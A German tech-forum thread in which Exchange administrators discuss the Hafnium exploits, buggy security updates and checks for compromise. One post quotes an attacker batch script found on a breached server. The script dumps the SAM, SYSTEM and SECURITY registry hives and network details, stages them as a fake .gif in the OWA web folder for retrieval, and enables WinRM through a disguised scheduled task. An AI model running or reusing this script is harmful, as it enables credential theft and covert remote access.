ComputerBase Menü
Aktuelles

News Hafnium-Exploits: Lücken in Exchange Server werden für Spionage genutzt

Immer schön Lücken schließen^^
Leider können die Programmierer nicht alles vorhersehen, was zum Misbrauch von Daten bzw. Der Kontrolle des Systems dienen kann.
Aber gut das wenigstens konstant daran gearbeitet wird das zu verbessern. Bei den einen schneller, bei den anderen langsamer 🙄
 
snaxilian schrieb:
Ach komm das glaubst du doch selbst nicht. Zum einen gibt/gab es weitere auch remote ausnutzbare Lücken in qmail
Zum Vergrößern anklicken....
Ich hab das nie bestritten. Im Gegenteil. siehe Posting #58

snaxilian schrieb:
und zum anderen bietet ein Exchange das ein oder andere zusätzliche Feature.
Zum Vergrößern anklicken....
Das ist korrekt. Aber rechne das mal runter auf die Defect-Rate (sprich: Bugs pro Codezeile).
Dann sieht es vermutlich immer noch verheerend schlimm für Exchange aus. :-)

snaxilian schrieb:
daher ist es dort auch "lukrativer" nach Lücken zu suchen
Zum Vergrößern anklicken....
Der "Trick" bei qmail ist ja schon es so zu programmieren das es sicher ist ist Du gar nicht erst viele Sicherheitslücken hast. Und für Exchange müsst Du nicht zu knapp löhnen. Da könnte man ja denken, die bei Microsoft sind um eine gewisse Qualitätssicherung bemüht.
 
Rickmer schrieb:
Das ist ein Update 'built to fail' -
Zum Vergrößern anklicken....
Wie wahr, wie wahr…

Ich war Faulheitsbedingt noch am CU22. Also CU23 installiert und über Windows Update direkt KB5000978 geladen. ECP zerschossen (Error 400), OWA zerschossen (Error 500), Management Shell zerschossen (findet keinen Server).

Da es nur ein Home&Hobby Server ist stört der Ausfall recht wenig und nach 5 Stunden Troubleshooting läuft wieder alles.

Nach dem Motto „never change a running system“, kann ich mir vorstellen, dass viele Server noch auf weit älteren CUs unterwegs sind und erst nach dem derzeitigen medialen Aufruf wieder mal updaten. Könnte noch eine Menge Spaß für manch Admins werden…
 
Ja, das Update ist definitiv durch keine QS gegangen. Auch wenn sie groß getönt haben es mit "Partnern" getestet zu haben.

Wir hatten CU23 zwar bereits, der KB hat dann trotzdem alles zerlegt. Am schönsten war es die %tempInstallDir% Einträge im IIS zu finden die eigentlich hätten Programm-Pfade sein müssen. Richtiger Scheiß.

Drei Tage später dann immer noch deaktivierte Dienste gefunden, die eigentlich hätten laufen sollen. Da wurde am Ende der Updateroutine wohl was vergessen.
 
Tronix schrieb:
Wie wahr, wie wahr…

Ich war Faulheitsbedingt noch am CU22. Also CU23 installiert und über Windows Update direkt KB5000978 geladen. ECP zerschossen (Error 400), OWA zerschossen (Error 500), Management Shell zerschossen (findet keinen Server).

Da es nur ein Home&Hobby Server ist stört der Ausfall recht wenig und nach 5 Stunden Troubleshooting läuft wieder alles.
Zum Vergrößern anklicken....
Updatecas1.ps1 ausführen und fertig, kein 5h Troubleshooting..
Das nach einem CU Update ECP oder OWA nicht funktionieren/falsch formatiert sind ist nicht ungewöhnliches.

paperw_ngs schrieb:
Wir hatten CU23 zwar bereits, der KB hat dann trotzdem alles zerlegt. Am schönsten war es die %tempInstallDir% Einträge im IIS zu finden die eigentlich hätten Programm-Pfade sein müssen. Richtiger Scheiß.

Drei Tage später dann immer noch deaktivierte Dienste gefunden, die eigentlich hätten laufen sollen. Da wurde am Ende der Updateroutine wohl was vergessen.
Zum Vergrößern anklicken....
Hast du die MSP Datei als Admin ausgeführt?
 
paperw_ngs schrieb:
Drei Tage später dann immer noch deaktivierte Dienste gefunden, die eigentlich hätten laufen sollen. Da wurde am Ende der Updateroutine wohl was vergessen.
Zum Vergrößern anklicken....
Wir haben am 03.-04.03 mehr als 30 Exchange Server aktualisiert ohne die von dir genannten Fehler. Es ist immer einfach zu behaupten die Schuld läge bei Microsoft, wenn die eigene Installation nach einem Update zerschossen ist, jedoch dürften tausende in den letzten Tagen die Updates eingespielt haben von angeblichen Problemen lese ich mal wieder nur hier im Forum.
Ergänzung ()

Tronix schrieb:
ECP zerschossen (Error 400), OWA zerschossen (Error 500), Management Shell zerschossen (findet keinen Server).
Zum Vergrößern anklicken....
Hier würden meine Alarmleuchten auf rot gehen, da in der Beschreibung der Lücke ausdrücklich veränderte Pfade für eben diese Seiten genannt werden, die stattdessen auf lokal installierte Webshells verweisen.

Wenn du das Update nicht bereits am 03.03 installiert hat und dein Server vom Internet aus erreichbar ist, wäre ich mir ziemlich sicher das die Installation längst kompromittiert wurde.
 
Zuletzt bearbeitet:
  • Gefällt mir
Reaktionen: konkretor und snaxilian
xexex schrieb:
Wenn du das Update nicht bereits am 03.03 installiert hat und dein Server vom Internet aus erreichbar ist, wäre ich mir ziemlich sicher das die Installation längst kompromittiert wurde.
Zum Vergrößern anklicken....
Das kann man ja mit den Skripten von MS sowie vom CERT-LV überprüfen, das ist ja nicht das Ding.
Zerschossene ECPs hatte ich aber auch bei 2 Servern gehabt. Einer davon war erst vor 3 Wochen aufgesetzt worden. Das kann immer mal vorkommen.
 
Tamron schrieb:
Hast du die MSP Datei als Admin ausgeführt?
Zum Vergrößern anklicken....
2019 lief ohne Probleme, 2013 war ein Graus. Wir sind mittlerweile aber auch mit allem durch, danke.
Heute noch gefunden, dass offenbar das Update den HostControllerService auf disabled gesetzt hat. Warum auch immer... :rolleyes:
xexex schrieb:
Wir haben am 03.-04.03 mehr als 30 Exchange Server aktualisiert ohne die von dir genannten Fehler. Es ist immer einfach zu behaupten die Schuld läge bei Microsoft, wenn die eigene Installation nach einem Update zerschossen ist, jedoch dürften tausende in den letzten Tagen die Updates eingespielt haben von angeblichen Problemen lese ich mal wieder nur hier im Forum.
Zum Vergrößern anklicken....
Ganz ruhig. Unsere Umgebung ist in etwa 4x so groß und wir hatte bei etwa 20% Probleme.
Ansonsten haben wir nie irgendwelche Probleme mit Updates. Nur eben mit diesem, da ist ein Rückschluss auf die QS durchaus erlaubt. Vor allem unter Anbetracht der Dringlichkeit in welcher das Ding rauskam.
Dazu war das Out of Band Customer Briefing vom MS voll mit exakt diesem Error.
 
xexex schrieb:
Wenn du das Update nicht bereits am 03.03 installiert hat und dein Server vom Internet aus erreichbar ist, wäre ich mir ziemlich sicher das die Installation längst kompromittiert wurde.
Zum Vergrößern anklicken....
Virenscanner haben nichts getriggert, Skripte von MS haben nichts gezeigt, die LogFiles haben keinen auffälligen Zugang gezeigt, genauso keine Auffälligkeiten bei Trafficscananalyse.

Btw: Auch MSERT erkennt mittlerweile die aktuellen Exploits.

Tamron schrieb:
Updatecas1.ps1 ausführen und fertig, kein 5h Troubleshooting..
Zum Vergrößern anklicken....
& UpdateConfig.ps1 war das erste. Ohne Erfolg. Aber ja, waren letztendlich die Bindings, bzw. ein paar kleinere Probleme die die Ereignisanzeige zugemüllt haben...
 
Zuletzt bearbeitet:
Tronix schrieb:
never change a running system
Zum Vergrößern anklicken....
Nein, eher ein klares Zeichen von überfordertem "Admin". Klar ist der potentielle Schaden geringer wenn man das System nur zum spielen/lernen verwendet und nicht darüber die eigenen Mails versendet und empfängt oder nicht die von Dritten. Wenn es einem der Aufwand wert ist was ja scheinbar der Fall ist wenn man sich die Preise für die Lizenzen so ansieht...
In dem Moment wo ich für mich oder auch Dritte irgendwelche Art von System oder Infrastruktur betreibe muss ich mir halt auch Gedanken darüber machen wie ich diese Infrastruktur in Schuss halte. Wenn von dem System dann noch potentiell Gefahr für unbeteiligte Dritte ausgehen kann (Server wird gehackt und für Angriffe auf Dritte verwendet, Spamversand, Amplification Attacks, etc) dann muss man sich noch mehr um Absicherung und Unterhalt kümmern. Kann oder will man dies nicht, weder aus technischer Sicht noch aus haftungsrechtlichen Fragen, dann sollte man so etwas nicht öffentlich erreichbar betreiben.

paperw_ngs schrieb:
Drei Tage später dann immer noch deaktivierte Dienste gefunden
Zum Vergrößern anklicken....
Kein Monitoring auf Dienste die eigentlich laufen sollten?^^
 
  • Gefällt mir
Reaktionen: xexex
DKK007 schrieb:
Ist mit der Lücke auch ein Zugriff auf die Mails möglich?
Zum Vergrößern anklicken....
Gestern einen Artikel in der FAZ gelesen. Das ganze Ding sucht wohl bis jetzt seinesgleichen. Tausende von Rechnern wurden infiziert, weltweit wohlgemerkt und sind potentiell immer noch angreifbar. Hierbei wurden auch gezielt Rüstungsunternehmen, Software-Unternehmen groß wie klein, Kraftwerke etc. attackiert welche essenziell für die Infrastruktur sind.
 
  • Gefällt mir
Reaktionen: DKK007
Ich habe heute das Update Exchange2016-KB5000871-x64-de installiert. Weiß jemand warum das nicht im Updateverlauf angezeigt wird? (Zuvor habe ich noch das Cu19 installieren müssen, weil wir nicht up to date waren)
 
Beim Exch16 muss ich passen, aber zumindest im Exch13 wird's ganz normal Windows Updateverlauf angezeigt...
 
@XamBonX
Es gibt auch Lücken die nur für Ransomware ausgenutzt werden. Dann wieder steht bei anderen Lücken der Kreditkartenklau/Onlinebanking Hack im Vordergrund. Andere Exploits werden von Spambots oder Crypto-Miner ausgenutzt. Finde den Artikel durchaus iO, denn hier steht anscheinend Industriespionage im Vordergrund…
 
  • Gefällt mir
Reaktionen: Crowbar und chartmix
leon_20v schrieb:
Ich habe heute das Update Exchange2016-KB5000871-x64-de installiert. Weiß jemand warum das nicht im Updateverlauf angezeigt wird? (Zuvor habe ich noch das Cu19 installieren müssen, weil wir nicht up to date waren)
Zum Vergrößern anklicken....
Bei uns wird es angezeigt.
1615221078858.png



Haben dann leider auch rausgefunden, dass es unseren Exchange erwischt hat.
Der MSERT hat einiges gefunden.

1615221143633.png
 
leon_20v schrieb:
Ich habe heute das Update Exchange2016-KB5000871-x64-de installiert. Weiß jemand warum das nicht im Updateverlauf angezeigt wird?
Zum Vergrößern anklicken....
Wenn du's manuell installiert hast: keine Ahnung warum, aber weder in Powershell (get-hotfix) noch der Updateverlauf zeigen es. Du musst in der Systemsteuerung unter 'installierte Updates' nachschauen.

Das hatte mich nach der ersten Installation auch irritiert weil ich zuerst mit Powershell nachprüfen wollte.
 
Bei einer Umgebung zum Vorschein gekommen unter C:\Windows\Temp:

xx.bat
Code: 
@echo on
    chcp 437
    echo cmd /c mkdir c:\windows\temp\debugsms>c:\windows\temp\TMP23875.bat
    echo cmd /c reg save hklm\sam C:\windows\temp\debugsms\sam>>c:\windows\temp\TMP23875.bat
    echo cmd /c reg save hklm\system C:\windows\temp\debugsms\system>>c:\windows\temp\TMP23875.bat
    echo cmd /c reg save hklm\security C:\windows\temp\debugsms\security>>c:\windows\temp\TMP23875.bat
    echo cmd /c choice /t 1 /d y /n ^>nul>>c:\windows\temp\TMP23875.bat
    echo cmd /c ipconfig /all ^>C:\windows\temp\debugsms\ip.txt>>c:\windows\temp\TMP23875.bat
    echo cmd /c arp -a ^>C:\windows\temp\debugsms\arp.txt>>c:\windows\temp\TMP23875.bat
    echo cmd /c dir /b /s c:\windows\temp\debugsms ^>c:\windows\temp\siineidvsms.log>>c:\windows\temp\TMP23875.bat
    echo cmd /c makecab /f c:\windows\temp\siineidvsms.log /d compressiontype=lzx /d compressionmemory=21 /d maxdisksize=10240000000  /d diskdirectorytemplate="C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth" /d cabinetnametemplate=getidtoken.gif >>c:\windows\temp\TMP23875.bat
    echo cmd /c choice /t 1 /d y /n ^>nul>>c:\windows\temp\TMP23875.bat
    echo cmd /c start c:\windows\temp\TMP23876.bat >>c:\windows\temp\TMP23875.bat
    echo cmd /c rmdir /s /q c:\windows\temp\debugsms >>c:\windows\temp\TMP23875.bat
    echo cmd /c winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"}>c:\windows\temp\TMP23876.bat
    echo cmd /c winrm quickconfig -q >>c:\windows\temp\TMP23876.bat
    echo cmd /c choice /t 1 /d y /n ^>nul>>c:\windows\temp\TMP23876.bat
    echo cmd /c winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"}>>c:\windows\temp\TMP23876.bat
    echo cmd /c del c:\windows\temp\TMP23875.bat >>c:\windows\temp\TMP23876.bat
    schtasks /create /ru system /tn "\Microsoft\Windows\WwanSvcdcs"  /tr "cmd /c c:\windows\temp\TMP23875.bat" /sc once /st 23:59
    ping -n 3 127.0.0.1
    schtasks /run /tn "\Microsoft\Windows\WwanSvcdcs"
    ping -n 3 127.0.0.1
    schtasks /delete /tn "\Microsoft\Windows\WwanSvcdcs" /f

TMP23876.bat
Code: 
cmd /c winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"}
cmd /c winrm quickconfig -q
cmd /c choice /t 1 /d y /n >nul
cmd /c winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"}
cmd /c del c:\windows\temp\TMP23875.bat

Die Gif die eigentlich eine Cab ist lag auch genau da wo in der .bat angegeben.

... wenigstens war der Autor von dem Skript nicht auf reine Zerstörung aus.
 
Zuletzt bearbeitet:
Rotkaeppchen schrieb:

Massive Welle von Hackerangriffen gefährdet deutsche Behörden

Sicherheitsexperten sind besorgt
Zum Vergrößern anklicken....
Natürlich sind die Besorgt. Wäre ich auch, wenn ich wüsste was dort noch so alles EOL rumsteht.
Das sind Komiker. Die meisten Betreiber von IT sind nach wie vor Neuländer und sind immer noch der Meinung IT sei nur zu Betriebsablaufsunterstützung da. Dumm nur, dass heutzutage nix mehr läuft ohne IT.
Und von wegen China ... ach ich hör auf, sonst rege ich mich nur wieder auf.
Ergänzung ()

Tronix schrieb:
Könnte noch eine Menge Spaß für manch Admins werden…
Zum Vergrößern anklicken....
Wem sagst Du das?
Ich habe unseren bis ins HO fluchen gehört. Und uns trennen gut 40km Luftlinie. ;)
 
  • Gefällt mir
Reaktionen: Rickmer
Für die, die noch nicht auf den aktuell supporteten CUs unterwegs sind, es gibt seit gestern Abend auch einen Weg ohne über die jeweils aktuellen CUs zu gehen:
https://techcommunity.microsoft.com...ity-updates-for-older-cumulative/ba-p/2192020

Für alle interessant, die sich vor nem CU Update noch sträuben, weil das idR mehr Vorbereitung bzw. Nacharbeiten bedeutet.

waxjee schrieb:
Haben dann leider auch rausgefunden, dass es unseren Exchange erwischt hat.
Der MSERT hat einiges gefunden.
Zum Vergrößern anklicken....
Ohne es jetzt genau geprüft zu haben - aber was macht dich so sicher, dass der Spaß von dieser Lücke hier kam?
Weil die CVE-2017 Dinger sind ja Lücken von Assbach. Klingt mir so, als wäre das schon seit sonstwann da drin...
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

SVΞN
News Microsoft Exchange: One-Click-Tool soll die Sicherheitslücken schließen
Antworten
19
Aufrufe
4.319
DKK007
DKK007
Zurück
Oben

Willkommen auf ComputerBase!

Mit Werbung weiterlesen

Besuche ComputerBase wie gewohnt mit Werbung und Tracking. Die Zustimmung ist jederzeit widerrufbar.

Details im Privacy Center und in der Liste unserer Partner. Ein Widerruf ist möglich in der Datenschutzerklärung.

… oder ComputerBase Pro bestellen

Nutze ComputerBase ohne Werbebanner, Video-Ads und Werbetracking schon für 4 €/Monat oder 36 €/Jahr.

Mehr zu ComputerBase Pro

Bereits Pro-Nutzer? Hier anmelden.

Tracking: Wir und unsere 165 Partner verarbeiten personenbezogene Daten, indem wir mit auf Ihrem Gerät gespeicherten Informationen (z. B. eindeutige Kennungen in Cookies) ein Nutzungsprofil erstellen, um z. B. Anzeigen zu personalisieren. Verarbeitungszwecke: Genaue Standortdaten und Abfrage von Geräteeigenschaften zur Identifikation, Informationen auf einem Gerät speichern und/oder abrufen, Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen.

Impressum Kontakt Datenschutz